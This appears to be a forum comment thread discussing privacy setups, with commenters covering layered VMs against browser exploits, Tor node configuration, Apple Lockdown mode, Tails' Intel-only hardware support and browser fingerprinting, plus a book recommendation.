Now an adversary that uses a Chrome exploit needs to break out of Windows and 2 layers of VM's before they get to my host. Breaking out of a VM is fairly doable, but breaking out of two will require lots of zero-days chained together (expensive).
Same if they find an exploit in tor.
For that, just a run-of-the-mill firefox exploit is all that is needed, and suddenly exploit code can do a wifi scan and get a very precise location.
You can also set up your own exit/guard node and configure Tor accordingly. While not a recommended setup, it works pretty reliably.
I consider my personal setup to be pretty good, but not Tails grade privacy: 1. Avoid installing apps, use Safari with all possible privacy settings. 2. Run Lockdown mode iOS, iPadOS, and macOS. 3. Use duck duck go and ProtonMail. 4. Prefer to run in Safari private browsing tabs. 5. Become non-private when logging into Amazon to make a purchase, etc.
I would love it if people more knowledgeable than I could critique my setup, make suggestions. Thanks in advance.
I would like to mention Cory Doctorow’s excellent new book The Internet Con [1]. It carries on in the fine tradition of the books Surveillance Capitalism and Privacy is Power for the narrative that regular law abiding people also benefit from doubling down on privacy.
[1] https://craphound.com/internetcon/
Tails runs on most computers. It doesn't have to be a "macOS" (you mean Apple?). macOS is an OS, tails replaces the OS.
But I understand the miscommunication, parent meant to say "of the Apple computers, it only runs on Intel ones". There is a world outside of Apple, you know :-)
Tails works on Intel arch. It does not work on ARM arch.
This has nothing to do with an Apple branded computer.
If you only have an ARM Mac, it's easy to get an old IBM-compatible laptop and run Tails. What matters is a decent speed of USB stick, and today they're generally decent. I find it helpful for testing some things, I can reboot and get to a known state.
If you want better protection for websites identifying you, you should consider researching on browser fingerprinting (which is extremely hard, if not impossible to do on Safari). If you want better protection overall, ditch Apple.
https://console.cloud.google.com/marketplace/product/techlat...